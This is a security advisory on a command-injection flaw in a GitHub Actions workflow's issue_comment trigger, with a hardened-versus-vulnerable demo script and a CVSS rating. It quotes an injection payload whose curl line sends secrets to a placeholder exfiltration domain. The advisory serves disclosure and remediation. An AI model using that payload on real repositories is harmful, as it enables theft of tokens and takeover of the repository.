Using the issue_comment trigger of .github/workflows/scalafmt-fix.yml, an attacker can inject malicious code through github.event.comment.body. By exploiting the vulnerability it is possible to exfiltrate the high-privileged GITHUB_TOKEN, which can be used to completely take over the repository since the token has contents write permission. In addition, it is also possible to exfiltrate the secret BROADBOT_GITHUB_TOKEN.

The issue_comment event in GitHub Actions becomes an injection path when the comment body is not handled as data. The following step is vulnerable because it directly interpolates untrusted user input into a shell script:
      - name: Check for ScalaFmt Comment
        id: check-comment
        run: |
          # ${{ github.event.comment.body }} is expanded into the script text before
          # bash parses it, so a crafted comment can close the quotes and the [[ ]]
          # test and append arbitrary commands.
          if [[ "${{ github.event_name }}" == "issue_comment" && "${{ github.event.comment.body }}" == *"scalafmt"* ]]; then
            echo "::set-output name=comment-triggered::true"
          else
            echo "::set-output name=comment-triggered::false"
          fi
In this case, it is possible to exfiltrate GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secrets.
To exploit the vulnerability, an attacker only needs to add a comment of the following form to any issue in the repository; the issue_comment trigger of .github/workflows/scalafmt-fix.yml then runs the injected commands on the runner:
test" == "test" ]]; then
& curl -s -d "$B64_BLOB" "https://$YOUR_EXFIL_DOMAIN/token" > /dev/null #
To prove this is possible, we created an issue and added a comment carrying the malicious code to extract the GITHUB_TOKEN and the BROADBOT_GITHUB_TOKEN secret. With the extracted GITHUB_TOKEN we were able to push a new PoC tag, which was deleted after a couple of minutes.
With a GITHUB_TOKEN that has write permissions, an attacker is usually able to completely take over the repository.
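The following script is an added example and is not code from the original report or from the affected project. It reproduces the injection locally by doing what the Actions runner does: splicing the value of ${{ github.event.comment.body }} into the text of the run: script before bash parses it. Beside it sits the hardened form of the same step, which passes the comment body through an environment variable so the shell only ever sees it as data. The marker file path, the simulated runner and the payload (which creates a marker file instead of exfiltrating secrets with curl) are assumptions made for this example.

```shell
#!/usr/bin/env bash
# Added example: not code from the original report or the affected project.
# Simulates the Actions runner expanding ${{ github.event.comment.body }} into
# the source text of a `run:` step, versus passing it via `env:`.

# Assumed marker location; the injected command creates this file so that the
# effect can be observed offline.
MARKER="${TMPDIR:-/tmp}/gha_injection_marker.$$"

# Constructed comment body in the shape of the report's payload. The real
# payload exfiltrates secrets with curl; here it only touches the marker file.
PAYLOAD="test\" == \"test\" ]]; then touch '$MARKER' #"

# Vulnerable: mirrors the original step. The body is interpolated into the
# script source, so quotes, ]] and # inside it are parsed as shell syntax.
vulnerable_step() {
  body=$1
  script="if [[ \"issue_comment\" == \"issue_comment\" && \"${body}\" == *\"scalafmt\"* ]]; then
  echo \"comment-triggered=true\"
else
  echo \"comment-triggered=false\"
fi"
  bash -c "$script"
}

# Hardened: the equivalent of
#   env:
#     COMMENT_BODY: ${{ github.event.comment.body }}
#   run: if [[ "$COMMENT_BODY" == *"scalafmt"* ]]; then ...
# The value reaches the shell as the contents of a variable, never as code.
hardened_step() {
  COMMENT_BODY=$1 bash -c '
if [[ "$COMMENT_BODY" == *"scalafmt"* ]]; then
  echo "comment-triggered=true"
else
  echo "comment-triggered=false"
fi'
}

# Returns 0 if the injected command ran (marker file exists), 1 otherwise,
# and removes the marker so the check can be repeated.
injection_succeeded() {
  if [ -f "$MARKER" ]; then
    rm -f "$MARKER"
    return 0
  fi
  return 1
}

echo "vulnerable step, payload comment: $(vulnerable_step "$PAYLOAD")"
if injection_succeeded; then echo "  -> injected command executed"; fi
echo "hardened step, payload comment:   $(hardened_step "$PAYLOAD")"
if ! injection_succeeded; then echo "  -> injected command did not execute"; fi
echo "hardened step, benign comment:    $(hardened_step "please run scalafmt")"
```

Note that the vulnerable variant reports comment-triggered=true even though the comment never mentions scalafmt: the payload rewrote the condition itself, which is why any logic after the interpolation cannot be trusted. The environment-variable indirection is the standard remediation for this class of expression injection; reducing the workflow's permissions: for GITHUB_TOKEN limits what a leaked token can do, but does not by itself stop the code execution.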
GITHUB_TOKEN Permissions...
CVSS 3.1 base score: 9.1 (Critical)
Exploitability: AV:N (Network), AC:L (Low), PR:N (None), UI:N (None)
Scope: S:U (Unchanged)
Impact: C:H (High), I:H (High), A:N (None)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N